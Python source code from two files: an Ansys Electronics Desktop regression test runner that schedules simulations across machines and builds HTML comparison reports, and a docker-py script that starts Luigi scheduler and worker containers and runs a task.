max_cores: int,
max_parallel_projects: int,
config_folder: Path,
out_dir: Optional[str],
save_projects: Optional[bool],
only_reference: Optional[bool],
reference_folder: Optional[Path],
) -> None:
logger.info(f"Initialize new Electronics Desktop Test run. Configuration folder is {config_folder}")
self.version = version
self.max_cores = max_cores
self.max_parallel_projects = max_parallel_projects
self.active_tasks = 0
self.out_dir = Path(out_dir) if out_dir else CWD_DIR
self.results_path = self.out_dir / f"results_{time_now(posix=True)}"
self.reference_folder = self.results_path / "reference_folder"
self.proj_dir = self.out_dir if save_projects else self.results_path
self.keep_sim_data = bool(save_projects)
self.only_reference = only_reference
self.reference_data = {}
if not only_reference and reference_folder is not None:
for ref in reference_folder.rglob("*.json"):
with open(ref) as file:
data = json.load(file)
self.reference_data[data["name"]] = data
self.script = str(MODULE_DIR / "simulation_data.py")
# logfile path will be appended dynamically later
self.script_args = f"\"--pyaedt-path='{Path(_py_aedt_path).parent.parent}' --logfile-path='{{}}'\""
self.report_data: Dict[str, Any] = {}
self.machines_dict = {machine.hostname: machine.cores for machine in get_job_machines()}
self.project_tests_config = read_configs(config_folder)
def validate_config(self) -> None:
"""Make quick validation of --config-folder [and --reference-file if present].
Checks that distribution is specified correctly and that projects in
reference identical to configuration.
"""
for project_name, config in self.project_tests_config.items():
distribution_config = config["distribution"]
if "parametric_tasks" in distribution_config:
tasks = distribution_config["parametric_tasks"]
cores = distribution_config["cores"]
if not isinstance(tasks, int):
raise KeyError("'parametric_tasks' key must be integer")
if tasks < 1:
raise KeyError("'parametric_tasks' key must be >= 1")
if tasks > cores:
# implicitly checks that cores >= 1
raise KeyError("'parametric_tasks' key must be <= 'cores'")
if cores % tasks != 0:
raise KeyError("'cores' divided by 'parametric_tasks' must be integer")
if not self.only_reference:
not_found_in_conf = set(self.reference_data) - set(self.project_tests_config)
if not_found_in_conf:
msg = (
f"Following projects defined in reference results: {', '.join(list(not_found_in_conf))}"
", but not specified in current configuration file"
)
raise KeyError(msg)
not_found_in_ref = set(self.project_tests_config) - set(self.reference_data)
if not_found_in_ref:
msg = (
f"Following projects defined in configuration file: {', '.join(list(not_found_in_ref))}"
", but not found in reference results file"
)
raise KeyError(msg)
logger.info("Configuration validation is successful")
def run(self) -> None:
"""Main function to start test suite."""
self.validate_hardware()
self.initialize_results()
threads_list = []
with mkdtemp_persistent(persistent=self.keep_sim_data, dir=self.proj_dir, prefix=f"{self.version}_") as tmp_dir:
for project_name, allocated_machines in self.allocator():
project_config = self.project_tests_config[project_name]
logger.info(f"Start project {project_name}")
copy_dependencies(project_config, tmp_dir)
project_path = copy_proj(project_config, tmp_dir)
thread_kwargs = {
"project_path": project_path,
"allocated_machines": allocated_machines,
"project_config": project_config,
"project_name": project_name,
}
thread = threading.Thread(target=self.task_runner, daemon=True, kwargs=thread_kwargs)
thread.start()
threads_list.append(thread)
for th in threads_list:
# wait for all threads to finish before delete folder
th.join()
self.render_main_html(finished=True) # make thread-safe render
msg = (
f"Job is completed.\nReference result folder is stored under {self.reference_folder}"
f"\nYou can view report by opening in web browser: {self.results_path / 'main.html'}"
)
logger.info(msg)
def validate_hardware(self) -> None:
"""Validate that we have enough hardware resources to run requested configuration."""
all_cores = [val for val in self.machines_dict.values()]
total_available_cores = sum(all_cores)
max_machine_cores = max(all_cores)
for proj in self.project_tests_config:
proj_cores = self.project_tests_config[proj]["distribution"]["cores"]
if proj_cores > total_available_cores or (
self.project_tests_config[proj]["distribution"]["single_node"] and proj_cores > max_machine_cores
):
raise ValueError(f"{proj} requires {proj_cores} cores. Not enough resources to run")
def initialize_results(self) -> None:
"""Copy static web parts (HTML, CSS, JS).
Mutate ``self.report_data``. Set all projects status to be ``'Queued'``, default link and delta.
"""
if self.results_path.exists():
remove_tree(str(self.results_path))
copy_path_to(str(MODULE_DIR / "static" / "css"), str(self.results_path))
copy_path_to(str(MODULE_DIR / "static" / "js"), str(self.results_path))
self.reference_folder.mkdir()
self.report_data["all_delta"] = 1 if not self.only_reference else None
self.report_data["projects"] = {}
for project_name, project_config in self.project_tests_config.items():
self.report_data["projects"][project_name] = {
"cores": project_config["distribution"]["cores"],
"status": "queued",
"link": None,
"delta": None,
"time": time_now(),
}
if not self.only_reference:
# initialize integer for proper rendering
self.report_data["projects"][project_name]["delta"] = 0
self.render_main_html()
def render_main_html(self, finished: bool = False) -> None:
"""Renders main report page.
Using ``self.report_data`` updates django template with the data.
Parameters
----------
finished : bool, default=False
When True send a context to stop refreshing the HTML page.
"""
ctx = {
"projects": self.report_data["projects"],
"finished": finished,
"all_delta": self.report_data["all_delta"],
"has_reference": not self.only_reference,
}
data = MAIN_PAGE_TEMPLATE.render(context=ctx)
with open(self.results_path / "main.html", "w") as file:
file.write(data)
def render_project_html(self, project_name: str, project_report: Dict[str, Union[List[Any], int]]) -> None:
"""Renders project report page.
Creates new page if none exists.
Updates django template with XY plots, mesh, etc data.
Parameters
----------
project_name : str
Name of the project to render.
project_report : dict
Data to render on plots.
"""
page_ctx = {
"plots": project_report["plots"],
"project_name": project_name,
"errors": project_report["error_exception"],
"mesh": project_report["mesh"],
"sim_time": project_report["simulation_time"],
"slider_limit": project_report["slider_limit"],
"has_reference": not self.only_reference,
}
data = PROJECT_PAGE_TEMPLATE.render(context=page_ctx)
with open(self.results_path / f"{project_name}.html", "w") as file:
file.write(data)
def task_runner(
self, project_name: str, project_path: str, project_config: Dict[str, Any], allocated_machines: Dict[str, Any]
) -> None:
"""Task runner that is called by each thread.
Mutates ``self.report_data["projects"]`` and ``self.machines_dict``
Calls update of HTML pages status, starts AEDT process, calls render of project_name.html
Parameters
----------
project_name : str
Name of the project to start.
project_path : str
Path to the project.
project_config : dict
Configuration of project, distribution, etc.
allocated_machines : dict
Machines and cores that were allocated for this task.
"""
self.report_data["projects"][project_name]["time"] = time_now()
self.report_data["projects"][project_name]["status"] = "running"
self.render_main_html()
log_file = LOGFOLDER_PATH / f"framework_{project_name}.log"
errors = None
try:
execute_aedt(
self.version,
allocated_machines,
distribution_config=project_config["distribution"],
script=self.script,
script_args=self.script_args.format(log_file),
project_path=project_path,
)
logger.debug(f"Project {project_name} analyses finished. Prepare report.")
except OSError as exc:
errors = str(exc)
finally:
# return cores back
for machine in allocated_machines:
self.machines_dict[machine] += allocated_machines[machine]["cores"]
project_report = self.prepare_project_report(project_name, project_path)
if errors:
project_report["error_exception"].insert(0, errors) # type: ignore[union-attr]
self.render_project_html(project_name, project_report)
status = "success" if not project_report["error_exception"] else "fail"
self.report_data["projects"][project_name].update(
{
"link": f"{project_name}.html",
"delta": project_report["slider_limit"],
"time": time_now(),
"status": status,
}
)
self.render_main_html()
self.active_tasks -= 1
def prepare_project_report(self, project_name: str, project_path: str) -> Dict[str, Union[List[Any], int]]:
"""Prepare project report dictionary that is required by ``render_project_html()``.
Parameters
----------
project_name : str
Name of the project.
project_path : str
Path to the project.
Returns
-------
project_report : dict
project report dictionary that is required by ``render_project_html()``.
"""
report_file = Path(project_path).parent / f"{project_name}.json"
project_report: Dict[str, Union[List[Any], Any]] = {
"plots": [],
"error_exception": [],
"mesh": [],
"simulation_time": [],
"slider_limit": 0,
}
project_data = self.check_all_results_present(project_report["error_exception"], report_file, project_name)
project_data["aedt_version"] = self.version
project_data["name"] = project_name
with open(self.reference_folder / f"ref_{project_name}.json", "w") as file:
json.dump(project_data, file, indent=4)
keys_missing = bool(project_report["error_exception"])
try:
project_report["error_exception"] += project_data["error_exception"]
if keys_missing:
# cannot do extraction if some keys are missing
return project_report
for design_name, design_data in project_data["designs"].items():
# get mesh data
self.extract_mesh_or_time_data("mesh", design_data, design_name, project_name, project_report)
# get simulation time
self.extract_mesh_or_time_data(
"simulation_time", design_data, design_name, project_name, project_report
)
# extract XY curve data
self.extract_curve_data(design_data, design_name, project_name, project_report)
except Exception as exc:
project_report["error_exception"].append(str(exc))
return project_report
def check_all_results_present(
self, project_exceptions: List[str], report_file: Path, project_name: str
) -> Dict[str, Any]:
"""Check that report file exists.
Check that project report exists in reference data.
Check that all keys present in the reference data are also in the current run data.
Check that all keys present in the current run data are also in the reference data.
Parameters
----------
project_exceptions : list
List to append with errors.
report_file : Path
JSON file path with results.
project_name : str
Name of the project.
Returns
-------
project_data : dict
Dictionary loaded from .json file.
"""
project_data: Dict[str, Any] = {}
if not report_file.exists():
project_exceptions.append(f"Project report for {project_name} does not exist")
return project_data
with open(report_file) as file:
project_data = json.load(file)
if not self.only_reference:
if project_name not in self.reference_data:
project_exceptions.append(f"Project report for {project_name} does not exist in reference file")
else:
compare_keys(
self.reference_data[project_name]["designs"],
project_data["designs"],
exceptions_list=project_exceptions,
results_type="current",
)
compare_keys(
project_data["designs"],
self.reference_data[project_name]["designs"],
exceptions_list=project_exceptions,
results_type="reference",
)
return project_data
def extract_curve_data(
self,
design_data: Dict[str, Any],
design_name: str,
project_name: str,
project_report: Dict[str, Union[List[Any], Any]],
) -> None:
"""Extract all XY curves for a particular design.
Mutate ``project_report``.
Parameters
----------
design_data : dict
All the data related to a single design in project_name.
design_name : str
Name of the design.
project_name : str
Name of the project.
project_report : dict
Project report dictionary that is required by 'render_project_html()'.
"""
for report_name, report_data in design_data["report"].items():
for trace_name, trace_data in report_data.items():
for curve_name, curve_data in trace_data["curves"].items():
plot_data = {
"name": f"{design_name}:{report_name}:{trace_name}:{curve_name}",
"id": unique_id(),
"x_label": f'"{trace_data["x_name"]} [{trace_data["x_unit"]}]"',
"y_label": f'"[{trace_data["y_unit"]}]"',
"x_axis": curve_data["x_data"],
"version_ref": -1,
"y_axis_ref": [],
"version_now": str(self.version),
"y_axis_now": curve_data["y_data"],
"diff": [],
"delta": -1,
}
if not self.only_reference:
y_ref_data = self.reference_data[project_name]["designs"][design_name]["report"][report_name][
trace_name
]["curves"][curve_name]["y_data"]
if len(y_ref_data) != len(curve_data["y_data"]):
msg = (
f"Number of trace points in reference data [{len(y_ref_data)}] isn't equal to "
f"number in current data [{len(curve_data['y_data'])}]"
)
project_report["error_exception"].append(msg)
continue
max_delta = 0
difference = []
for ref, actual in zip(y_ref_data, curve_data["y_data"]):
difference.append(ref - actual)
if actual != 0:
# if 0, just skip, no sense for 'infinite' delta
max_delta = max(max_delta, abs(1 - ref / actual))
max_delta_perc = round(max_delta * 100, 3)
# take always integer since ticks are integers, and +1 to allow to slide
project_report["slider_limit"] = max(project_report["slider_limit"], int(max_delta_perc) + 1)
plot_data.update(
{
"version_ref": self.reference_data[project_name]["aedt_version"],
"y_axis_ref": y_ref_data,
"diff": difference,
"delta": max_delta_perc,
}
)
project_report["plots"].append(plot_data)
def extract_mesh_or_time_data(
self,
key_name: str,
design_data: Dict[str, Any],
design_name: str,
project_name: str,
project_report: Dict[str, Union[List[Any], Any]],
) -> None:
"""Extract mesh or simulation time information.
Mutate project_report.
Parameters
----------
key_name : str
Mesh or simulation_time, depending on what to extract.
design_data : dict
All the data related to a single design in ``project_name``.
design_name : str
Name of the design.
project_name : str
Name of the project.
project_report : dict
Project report dictionary that is required by ``render_project_html()``.
"""
for variation_name, variation_data in design_data[key_name].items():
for setup_name, current_stat in variation_data.items():
stat_dict = {
"name": f"{design_name}:{setup_name}:{variation_name}",
"current": current_stat,
}
if not self.only_reference:
reference_dict = self.reference_data[project_name]["designs"][design_name][key_name]
if variation_name not in reference_dict:
project_report["error_exception"].append(
f"Variation ({variation_name}) wasn't found in reference results for design: {design_name}"
)
continue
stat_dict["ref"] = reference_dict[variation_name][setup_name]
project_report[key_name].append(stat_dict)
def allocator(self) -> Iterable[Tuple[str, Dict[str, Dict[str, int]]]]:
"""Generator that yields resources.
Waits until resources are available.
Yields
------
proj_name : str
Name of the project.
allocated_machines : Dict
Allocated machines.
"""
sorted_by_cores_desc = sorted(
self.project_tests_config.keys(),
key=lambda x: self.project_tests_config[x]["distribution"]["cores"],
reverse=True,
)
proj_name = ""
while sorted_by_cores_desc:
if self.active_tasks >= self.max_parallel_projects:
logger.debug("Number of maximum tasks limit is reached. Wait for job to finish")
sleep(4)
continue
allocated_machines = None
for proj_name in sorted_by_cores_desc:
# first try to fit all jobs within a single node for stability, since projects are sorted
# by cores, this ensures that we have optimized resource utilization
allocated_machines = allocate_task_within_node(
self.project_tests_config[proj_name]["distribution"], self.machines_dict
)
if allocated_machines:
break
else:
for proj_name in sorted_by_cores_desc:
# since no more machines to fit the whole project, let's split it across machines
allocated_machines = allocate_task(
self.project_tests_config[proj_name]["distribution"], self.machines_dict
)
if allocated_machines:
break
else:
msg = "Waiting for resources. Cores left per machine:\n"
for machine, cores in self.machines_dict.items():
msg += f"{machine} has {cores} core(s) free\n"
logger.debug(msg)
sleep(5)
if allocated_machines:
for machine in allocated_machines:
self.machines_dict[machine] -= allocated_machines[machine]["cores"]
sorted_by_cores_desc.remove(proj_name)
self.active_tasks += 1
yield proj_name, allocated_machines
def allocate_task(
distribution_config: Dict[str, int], machines_dict: Dict[str, int]
) -> Optional[Dict[str, Dict[str, int]]]:
"""Allocate task on one or more nodes.
Will use MPI and split the job.
If multiple parametric tasks are defined, distribute uniformly.
Parameters
----------
distribution_config : dict
Data about required distribution for the project.
machines_dict : dict
All available machines in pool.
Returns
-------
dict
Allocated machines for the project or ``None`` if not allocated.
"""
if distribution_config["single_node"]:
return None
allocated_machines = {}
tasks = distribution_config["parametric_tasks"]
cores_per_task = int(distribution_config["cores"] / tasks)
to_fill = distribution_config["cores"]
for machine, cores in machines_dict.items():
if cores < 1:
# skip machine if no cores available
continue
if tasks == 1:
allocate_cores = cores if to_fill - cores > 0 else to_fill
allocate_tasks = 1
else:
# if tasks are specified, we cannot allocate less cores than in cores_per_task
if cores < cores_per_task:
continue
allocate_tasks = min((cores // cores_per_task, tasks))
tasks -= allocate_tasks
allocate_cores = cores_per_task * allocate_tasks
allocated_machines[machine] = {
"cores": allocate_cores,
"tasks": allocate_tasks,
}
to_fill -= allocate_cores
if to_fill <= 0:
break
if to_fill > 0:
# not enough resources
logger.debug("Not enough resources to split job")
return None
return allocated_machines
def allocate_task_within_node(
distribution_config: Dict[str, int], machines_dict: Dict[str, int]
) -> Dict[str, Dict[str, int]]:
"""Try to fit a task in a node without splitting.
Parameters
----------
distribution_config : dict
Data about required distribution for the project.
machines_dict : dict
All available machines in pool.
Returns
-------
machines : dict
Allocated machines for the project or ``None`` if not allocated.
"""
for machine, cores in machines_dict.items():
if cores - distribution_config["cores"] >= 0:
return {
machine: {
"cores": distribution_config["cores"],
"tasks": distribution_config["parametric_tasks"],
}
}
return {}
def copy_proj(project_config: Dict[str, Any], dst: str) -> Union[str, List[str]]:
"""Copy project to run location, temp by default.
Parameters
----------
project_config : dict
Configuration of project, distribution, etc.
dst : str
Path where to copy.
Returns
-------
path : str
Location where it was copied.
"""
src = project_config["path"]
return copy_path_to(src, dst)
def copy_dependencies(project_config: Dict[str, Any], dst: str) -> None:
"""Copies project dependencies to run location.
Parameters
----------
project_config : dict
Configuration of project, distribution, etc.
dst : str
Path where to copy.
"""
deps = project_config["dependencies"]
if isinstance(deps, list):
for dep in deps:
copy_path_to(dep, dst)
elif isinstance(deps, str):
copy_path_to(deps, dst)
def copy_path_to(src: str, dst: str) -> Union[str, List[str]]:
"""Copy path from src to dst.
If ``src`` is a relative path, preserves relative folder tree.
Parameters
----------
src : str
Path with copy target, relative or absolute.
dst : str
Path where to copy.
Returns
-------
path: str or list
Path to copied file or list with paths if folder is copied.
"""
src_path = Path(src.replace("\\", "/"))
if not src_path.is_absolute() and len(src_path.parents) > 1:
unpack_dst = Path(dst) / src_path.parents[0]
if not src_path.is_file():
unpack_dst /= src_path.name
elif not src_path.is_file():
unpack_dst = Path(dst) / src_path.name
else:
unpack_dst = Path(dst)
src_path = src_path.expanduser().resolve()
if not src_path.exists():
raise FileExistsError(f"File {src_path} doesn't exist")
dst = str(unpack_dst)
mkpath(dst)
if src_path.is_file():
file_path = copy_file(str(src_path), dst)
return file_path[0]
else:
return copy_tree(str(src_path), dst)
def mkdtemp_persistent(*args: Any, persistent: bool = True, **kwargs: Any) -> Any:
"""Provides a context manager to create a temporary/permanent directory depending on 'persistent' argument
Parameters
----------
*args: Any
TemporaryDirectory args
persistent : bool, default=True
If ``True``, create a permanent directory.
**kwargs: Any
TemporaryDirectory keyword arguments.
Returns
-------
tempfile.TemporaryDirectory
Context manager with temp directory from ``tempfile`` module.
"""
if persistent:
@contextmanager
def normal_mkdtemp() -> Iterator[str]:
yield tempfile.mkdtemp(*args, **kwargs)
return normal_mkdtemp()
else:
return tempfile.TemporaryDirectory(*args, **kwargs)
def generator_unique_id() -> Iterator[str]:
"""Generator that incrementally yields new IDs."""
i = 1
while True:
yield f"a{i}"
i += 1
id_generator = generator_unique_id()
def unique_id() -> str:
"""When called runs generator to pick new unique ID.
Returns
-------
id : str
New ID.
"""
return next(id_generator)
def execute_aedt(
version: str,
machines: Dict[str, Any],
distribution_config: Dict[str, Any],
script: Optional[str] = None,
script_args: Optional[str] = None,
project_path: Optional[str] = None,
) -> None:
"""Execute single instance of Electronics Desktop.
Parameters
----------
version : str
Version to run.
machines : dict
Machine specification for current job.
distribution_config : dict
Distribution configuration for the job.
script : str, optional
Path to the script.
script_args : str, optional
Arguments to the script.
project_path : str, optional
Path to the project.
"""
aedt_path = get_aedt_executable_path(version)
command = [aedt_path]
if distribution_config["auto"]:
aedt_format_machines = ",".join([f"{name}:-1:{conf['cores']}:90%" for name, conf in machines.items()])
command += ["-auto", f"NumDistributedVariations={distribution_config['parametric_tasks']}"]
else:
aedt_format_machines = ",".join(
[f"{name}:{conf['tasks']}:{conf['cores']}:90%" for name, conf in machines.items()]
)
command.append("-distributed")
dist_type_str = ",".join([dist_type for dist_type in distribution_config["distribution_types"]])
command.append(f"includetypes={dist_type_str}")
tasks = int(distribution_config["multilevel_distribution_tasks"])
if tasks > 0:
command.append("maxlevels=2")
command.append(f"numlevel1={tasks}")
command += ["-machinelist", "list=" + aedt_format_machines]
if script is not None:
command += [
"-ng",
"-features=SF6694_NON_GRAPHICAL_COMMAND_EXECUTION",
"-RunScriptAndExit",
script,
]
if script_args is not None:
command += [
"-ScriptArgs",
f'"{script_args}"',
]
if project_path is not None:
log_path = f"{LOGFOLDER_PATH / Path(project_path).stem}.log"
command += [
"-LogFile",
log_path,
project_path,
]
if platform.system() == "Linux":
logger.debug("Execute via Intel MPI")
mpi_path = get_intel_mpi_path(version)
command = [mpi_path, "-envall", "-n", "1", "-hosts", list(machines.keys())[0]] + command
logger.debug(f"Execute {subprocess.list2cmdline(command)}")
output = subprocess.check_output(command)
logger.debug(output.decode())
def get_intel_mpi_path(version: str) -> str:
"""Get path to Intel MPI on Linux machines.
Parameters
----------
version : str
Version of Electronics Desktop.
Returns
-------
path : str
Path to Electronics Desktop Intel MPI `mpiexec`.
"""
aedt_path = get_aedt_install_path(version)
mpi_path = aedt_path / "common" / "fluent_mpi" / "multiport" / "mpi" / "lnamd64" / "intel" / "bin" / "mpiexec"
if not mpi_path.exists():
raise OSError(f"Intel MPI doesn't exist under {mpi_path}")
return str(mpi_path)
def get_aedt_executable_path(version: str) -> str:
"""Get platform specific Electronics Desktop executable path.
Parameters
----------
version : str
Version of Electronics Desktop.
Returns
-------
path : str
Path to Electronics Desktop executable.
"""
aedt_path = get_aedt_install_path(version)
if platform.system() == "Windows":
executable = "ansysedt.exe"
elif platform.system() == "Linux":
executable = "ansysedt"
else:
raise SystemError("Platform is neither Windows nor Linux")
aedt_path = aedt_path / executable
return str(aedt_path)
def get_aedt_install_path(version: str) -> Path:
"""Extract installation path of AEDT from environment variable.
Parameters
----------
version : str
Version of Electronics Desktop.
Returns
-------
path : Path
Path to Electronics Desktop root.
"""
aedt_env = f"ANSYSEM_ROOT{version}"
aedt_path = os.environ.get(aedt_env, None)
if not aedt_path:
raise ValueError(f"Environment variable {aedt_env} is not set.")
return Path(aedt_path)
def time_now(posix: bool = False) -> str:
"""Return current date and time.
Parameters
----------
posix : bool
Set to True if need to return date time to be compatible with file names.
Returns
-------
str
Date and time now.
"""
time_format = "%Y_%m_%d_%H_%M_%S" if posix else "%Y-%m-%d %H:%M:%S"
return datetime.datetime.now().strftime(time_format)
def compare_keys(
dict_1: Dict[Any, Any],
dict_2: Dict[Any, Any],
exceptions_list: List[str],
*,
dict_path: str = "",
results_type: str = "reference",
) -> None:
"""Compare that keys from ``dict_1`` are present in ``dict_2`` recursively.
Mutates ``exceptions_list`` and appends errors if key is not present.
"""
if dict_path:
dict_path += "->"
for key, val in dict_1.items():
if key not in dict_2:
exceptions_list.append(f"Key '{dict_path}{key}' does not exist in {results_type} results")
continue
if isinstance(val, dict):
compare_keys(val, dict_2[key], exceptions_list, dict_path=f"{dict_path}{key}", results_type=results_type)
def read_configs(config_folder: Path) -> Dict[str, Any]:
"""Reads configuration files.
Reads all .toml files from config_folder and prefills them with default configuration settings.
Parameters
----------
config_folder : Path
Path to configuration folder.
Returns
-------
dict
Merged dictionary with all projects.
"""
project_tests_config = {}
for config_file in config_folder.rglob("*.toml"):
logger.debug(f"Add config {config_file}")
with open(config_file, "rb") as file:
proj_conf = tomli.load(file)
try:
proj_conf = proj_conf["project"]
proj_name = proj_conf["name"]
except KeyError as exc:
raise KeyError("Configuration file misses project name or has incorrect format") from exc
default_config = {
"path": f"{proj_name}.aedt",
"dependencies": [],
"distribution": {
"cores": 1,
"distribution_types": ["default"],
"parametric_tasks": 1,
"multilevel_distribution_tasks": 0,
"single_node": False,
"auto": True,
},
}
merged = dict(default_config, **proj_conf)
merged["distribution"] = dict(
default_config["distribution"], **proj_conf.get("distribution", {}) # type: ignore[arg-type]
)
project_tests_config[proj_name] = merged
if not project_tests_config:
raise ValueError("Project configuration files (.toml) were not found.")
return project_tests_config
def parse_arguments() -> argparse.Namespace:
"""Parse CLI arguments.
Returns
-------
args : argparse.Namespace
Validated arguments.
"""
parser = argparse.ArgumentParser()
parser.add_argument("--aedt-version", required=True, help="Electronics Desktop version to test, e.g. 221")
parser.add_argument("--config-folder", required=True, help="Path to project configuration folder")
parser.add_argument("--reference-folder", help="Reference results folder path")
parser.add_argument("--only-reference", action="store_true", help="Only create reference results")
parser.add_argument(
"--only-validate", action="store_true", help="Only validate current --config-file [and --reference-file]"
)
parser.add_argument(
"--suppress-validation",
action="store_true",
help="Suppress validation of config file and reference file (DANGEROUS)",
)
parser.add_argument(
"--out-dir", "-o", help="Output directory for reports and project files (if --save-sim-data set)"
)
parser.add_argument(
"--save-sim-data", "-s", action="store_true", help="Save simulation data under output dir (--out-dir flag)"
)
parser.add_argument("--max-cores", "-c", type=int, help="total number of cores limit", default=99999)
parser.add_argument(
"--max-projects", "-mp", type=int, help="total number of parallel projects limit", default=99999
)
parser.add_argument("--debug", action="store_true", help="Adds additional DEBUG logs")
cli_args = parser.parse_args()
log_level = 10 if cli_args.debug else 20
if not LOGFOLDER_PATH.exists():
LOGFOLDER_PATH.mkdir()
set_logger(logging_file=LOGFILE_PATH, level=log_level, pyaedt_module=None)
if not cli_args.only_reference:
if not cli_args.reference_folder:
raise ValueError("Either set --only-reference flag or provide path via --reference-folder")
cli_args.reference_folder = Path(cli_args.reference_folder)
if not cli_args.reference_folder.is_dir():
raise ValueError(f"Reference folder does not exist: {cli_args.reference_folder}")
if len(list(cli_args.reference_folder.rglob("*.json"))) < 1:
raise ValueError(f"No reference .json file found in {cli_args.reference_folder}")
if cli_args.suppress_validation and cli_args.only_validate:
raise ValueError("--only-validate and --suppress-validation are mutually exclusive")
if not (cli_args.max_cores or cli_args.max_tasks):
logger.warning(
"No limits are specified for current job. This may lead to failure if you lack of license or resources"
)
aedt_version_pattern = re.compile(r"\d\d\d$")
if not aedt_version_pattern.match(cli_args.aedt_version):
raise ValueError("Electronics Desktop version value is invalid. Valid format example: 221")
cli_args.config_folder = Path(cli_args.config_folder)
if not cli_args.config_folder.is_dir():
raise ValueError(f"Configuration folder does not exist: {cli_args.config_folder}")
if cli_args.save_sim_data and not cli_args.out_dir:
raise ValueError("Saving of simulation data was requested but output directory is not provided")
return cli_args
if __name__ == "__main__":
main()
|
prep_luigi.py | # encoding='utf-8'
"""
prep_luigi.py
sets up a luigid scheduler container and luigi worker
sets up TLS support so they can talk to each other
lets the worker execute a task
see docker-py on github and docs.docker site
"""
import docker # to talk to docker
import pprint # for printing to the command line
import logging # log progress, or lack thereof
from threading import Thread # to run selenium on its own thread
from selenium import webdriver # launch a browser to watch luigid scheduler
import time # to control a loop and/or a browser
# TODO:
# bind logs directory with /var/log
# remove the worker container after the task is done
# let it tell you what it's doing on a slack channel
# make some more task classes
# set the luigi-worker working dir to scripts directory
# append a timestamp to task names so that tasks are unique
# move this to docker-compose yml file?
# minimal logging...
logging.basicConfig(
filename="prep_luigi.log",
level=logging.DEBUG,
format='%(asctime)s %(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p',
filemode='w'
)
logging.debug("Start - debug")
#logging.info("Start - info")
#logging.error("Start - error")
#client = docker.from_env(assert_hostname=False)
#print (client.version())
# set paths to certs for tls
# set base url
tls_config = docker.tls.TLSConfig \
(client_cert= \
('C:\\Users\\trota\\.docker\\machine\\certs\\cert.pem', \
'C:\\Users\\trota\\.docker\\machine\\certs\\key.pem'), \
verify='C:\\Users\\trota\\.docker\\machine\\certs\\ca.pem' \
)
client = docker.Client(base_url='https://192.168.99.100:2376', tls=tls_config)
# print some information about the environment
info = client.info()
pp = pprint.PrettyPrinter(indent=4)
print(" ")
print("****************Info********************")
print(" ")
pp.pprint(info)
print(" ")
#print(" ")
#print("*************Images****************")
#print(" ")
#pp.pprint(client.images())
#print(" ")
#print(" ")
#print("*************Volumes****************")
#print(" ")
#pp.pprint(client.volumes())
#print(" ")
#print(" ")
# create a luigid container
# bind a directory to the container for persistant task history
containerA = client.create_container (
image='tedder42/docker-luigid:latest',
hostname="luigi-monitor",
name="luigi-monitor",
ports=[8082, 2376],
host_config=client.create_host_config(
port_bindings={8082: ('192.168.99.100', 8082)},
binds={'/c/Users/trota/Source/luigi/docker-luigi/luigid/state': {
'bind': '/var/tmp',
'mode': 'rw',
}
}
)
)
if containerA is not None:
# create a worker container
# bind a scripts directory to the container
containerB = client.create_container(
#image='trota/docker-luigi-worker:latest', # py 2.7
image='trota/luigi-worker3:python3', # py 3.5
ports=[8082, 2376],
#command='/usr/local/app1/scripts/run.sh',
stdin_open=True,
tty=True,
name='luigi-worker',
host_config=client.create_host_config(binds={
'/c/Users/trota/Source/luigi/docker-luigi/scripts': {
'bind': '/usr/local/app1/scripts/test',
'mode': 'rw',
}
})
)
print(" ")
print("************Containers****************")
print(" ")
print('containerA', containerA)
print(" ")
print('containerB', containerB)
print(" ")
print("")
print("0")
print("")
# start the containers
client.start(containerA)
client.start(containerB)
print("")
print("containerA")
pp.pprint(client.inspect_container(containerA))
print("")
print("")
print("1")
print("containerB")
pp.pprint(client.inspect_container(containerB))
print("")
# open a browser for luigid
def open_browser():
# TODO: make this a class with tasks pending and running as object properties
browser = webdriver.Chrome()
browser.get('http://192.168.99.100:8082/static/visualiser/index.html#')
tasks_pending = browser.find_element_by_css_selector(
"#PENDING_info span.info-box-number"
)
tasks_running = browser.find_element_by_css_selector(
"#RUNNING_info span.info-box-number"
)
num_tasks_pending = tasks_pending.text
num_tasks_running = tasks_running.text
num_tasks_pending.strip()
num_tasks_running.strip()
print("")
print("pending: ", tasks_pending.text)
print("")
print("running: ", tasks_running.text)
#time_end = time.time() + 60 * 5
#while time.time() < time_end:
while (int(num_tasks_pending) > 0) or (int(num_tasks_running) > 0):
time.sleep(5)
browser.refresh()
tasks_pending = browser.find_element_by_css_selector(
"#PENDING_info span.info-box-number"
)
tasks_running = browser.find_element_by_css_selector(
"#RUNNING_info span.info-box-number"
)
num_tasks_pending = tasks_pending.text
num_tasks_running = tasks_running.text
num_tasks_pending.strip()
num_tasks_running.strip()
if (int(num_tasks_pending) == 0) and (int(num_tasks_running) == 0):
time.sleep(5) # give yourself 5 secs to see small tasks
browser.quit()
# let the browser have its own thread
# browser_thread = Thread(target=open_browser)
# browser_thread.start()
# set up commands to execute
# TODO:
# let commands live in their own files
# to run a python script from a shell script
# (i.e. docker run -it -rm --name luigi_worker trota/docker-luigi-worker "/usr/local/app1/scripts/run.sh")
#cmd_dict = client.exec_create(
# container=containerB.get('Id'),
# cmd='/usr/local/app1/scripts/run.sh', stdout=True, stderr=True
# )
# to run a python script somewhat more directly
cmd_dict = client.exec_create(
container=containerB.get('Id'),
#cmd="python -m luigi --module 'c:\\Users\\trota\\Source\\luigi\\docker-luigi\\scripts\\task_process_xml.py' ConvertFile --in_file fruits.xml",
#cmd='python /usr/local/app1/scripts/test/task_process_xml.py',
cmd='python /usr/local/app1/scripts/test/task_ftp.py',
stdout=True, stderr=True
)
# to run a python script with arguments
# in a container with cmd of python, where you have a python prompt at entry
# exec(compile(open(filename, "rb").read(), filename, 'exec'), globals, locals)
# or
# exec(open("./filename").read())
#task_file="/usr/local/app1/scripts/test/task_process_xml.py"
#cmd_dict = client.exec_create(
# container=containerB.get('Id'),
# #cmd='exec(compile(open(task_file, "rb").read(), task_file, 'exec'))'
# stdout=True, stderr=True, stdin=True
# )
print("")
print("2")
print("")
print("")
pp.pprint(client.containers())
print("")
print("")
# loop through the command(s)
for k, v in cmd_dict.items():
print(k, v)
print(" ")
pp.pprint(client.exec_inspect(v))
logging.debug("Command: %s", client.exec_inspect(v))
print(" ")
# exec_start to run the command(s) we just set up
# Just for containers which are running - you can set command in create_container.
print("executing argument...")
cmd_result = client.exec_start(v)
print("")
print("")
# see what execution returned
pp.pprint(cmd_result)
cmd_result = cmd_result.decode("utf-8")
print(cmd_result)
print("")
print("done")
# force removal of the worker container and any volumes
client.remove_container(
container=containerB,
v=True,
force=True)
# feeble thread management - the selenium browsers thread
